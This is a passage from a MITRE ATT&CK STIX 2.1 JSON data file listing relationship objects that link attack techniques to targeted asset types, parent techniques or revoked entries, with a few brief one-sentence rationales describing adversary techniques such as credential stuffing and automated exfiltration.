["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:26:47.786Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45aae58e-1d09-49de-b4c2-837c6f1d5d8f", "created": "2023-10-02T20:22:02.539Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:22:02.539Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45ac8255-65b5-4cae-92ce-1e435da5efa1", "created": "2020-01-24T14:21:52.967Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45d14170-7f7b-4e08-b53f-42fa4a3a04d9", "created": "2023-09-28T20:15:32.382Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:15:32.382Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45d6b670-d781-49fe-8688-d403c9033429", "created": "2022-05-27T14:06:05.236Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-27T14:06:05.236Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--926d8cfd-1d0d-4da2-ab49-3ca10ec3f3b5", "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46690df4-ddac-4ed4-8987-8706ae68a0cf", "created": "2023-09-29T16:42:20.944Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:42:20.944Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46798892-d849-43fe-8147-b40cc9da291e", "created": "2023-09-28T19:42:29.359Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:42:29.359Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46b33aec-21e6-4a5d-b99d-6ce4396a16d8", "created": "2020-10-01T00:49:05.550Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46c0157e-ca53-48aa-858a-b41fa6a8720e", "created": "2024-05-23T04:09:45.279Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:43:22.957Z", "description": "Asset Mapping Rationale: Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network.", "relationship_type": "targets", "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46c31831-b5b7-4e33-a9a2-2fb2f4ab29f8", "created": "2020-03-19T19:10:25.629Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df", "target_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46e4cdd2-e8f0-46aa-9264-868815a05af9", "created": "2024-03-25T20:17:59.424Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-25T20:17:59.424Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4768c731-3be9-44b8-a217-dfbececa57d9", "created": "2023-09-29T18:06:22.868Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:06:22.868Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--47acf59d-7476-4794-b359-747da52f196c", "created": "2020-02-11T18:28:45.055Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--483719ad-c973-4210-b059-14e87dbd45f8", "created": "2023-09-28T19:49:43.417Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:49:43.417Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--484a1a7a-9e4e-4815-85bd-82a7ea607f2d", "created": "2020-03-19T15:11:39.887Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a", "target_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--484b0873-59ef-41a3-b33d-b3fb41a2c957", "created": "2024-04-09T20:50:34.946Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:50:34.946Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--48562a7a-c167-4116-8438-b9ebad6c22ef", "created": "2024-05-22T17:27:28.301Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:44:32.115Z", "description": "Asset Mapping Rationale: An adversary may gather the system time and/or time zone settings from a local or remote system. On network devices, Network Device CLI commands such as show clock detail can be used to see the current time configuration.", "relationship_type": "targets", "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4883d738-7773-45c4-8c40-0d7a292f119c", "created": "2024-05-22T17:14:42.539Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:46:21.450Z", "description": "Asset Mapping Rationale:", "relationship_type": "targets", "source_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--48f191ab-6e27-44cd-9de6-a0e06e58d983", "created": "2020-03-14T23:39:50.313Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "target_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--490ec3a5-d7e5-4d75-840e-652bf6b2e7a9", "created": "2024-05-22T17:22:34.371Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T01:47:48.386Z", "description": "Asset Mapping Rationale: Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Typically, management services over commonly used ports are used when stuffing credentials. ", "relationship_type": "targets", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--491c6bbd-3ca5-4e79-a35a-ef00625cb7e7", "created": "2022-03-04T18:56:38.982Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bed04f7d-e48a-4e76-bd0f-4c57fe31fc46", "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--49242ea8-4813-49f7-8bd4-9668216cceeb", "created": "2023-09-29T16:45:53.300Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:45:53.300Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--496b2565-c0fb-4de7-8446-e8125bfa4f28", "created": "2020-02-21T21:17:03.463Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4981a944-b3ad-4d78-9881-a17d458e3422", "created": "2023-09-28T20:01:30.138Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:01:30.138Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4995479d-2d59-4ca0-b6d0-c86a82bbad65", "created": "2024-05-22T17:18:01.244Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:03:00.842Z", "description": "Asset Mapping Rationale: Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features.", "relationship_type": "targets", "source_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--49c28aef-b7a2-464f-af3d-e104f9edf119", "created": "2020-02-10T20:30:07.540Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4a641966-3cc8-4dd6-aa61-1a96cfff4a05", "created": "2023-09-28T19:41:47.648Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:41:47.648Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4a7340fc-0eec-4459-a491-952d736b79ef", "created": "2023-09-28T19:50:42.505Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:50:42.505Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4a73a308-45aa-4dcd-9253-c15a065fac84", "created": "2020-01-14T17:18:32.236Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4a96d822-28cc-4820-8fb0-d7a049547bc9", "created": "2020-02-05T20:08:34.091Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ab2b092-a8c3-4728-9d3d-806c1ddb4796", "created": "2020-03-27T21:50:26.220Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", "target_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ad48410-efd9-41c0-ac59-e4343d3b9198", "created": "2023-09-28T21:09:50.956Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:09:50.956Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4b060a1c-932f-4864-a5a4-83f324b62338", "created": "2021-05-11T18:51:16.451Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3", "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4b23ce54-a782-4af5-99bd-8bc59c2893b2", "created": "2020-10-01T02:14:18.100Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4b6a964f-af5c-4ec2-a309-c1ae6b929596", "created": "2023-09-28T21:24:51.818Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:24:51.818Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4b853b7c-bc55-4599-b88d-d08d651526c0", "created": "2023-09-29T18:49:25.209Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:49:25.209Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c1c9ac8-e8b4-451c-991f-faf7e03d2e08", "created": "2020-01-24T14:08:23.368Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--e906ae4d-1d3a-4675-be23-22f7311c0da4", "target_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c1df272-9c2a-4647-8d05-3c0de1613e12", "created": "2023-09-28T19:59:23.856Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:59:23.856Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c42863f-8f57-4948-afe3-922a30f193fa", "created": "2020-10-01T00:54:30.974Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": 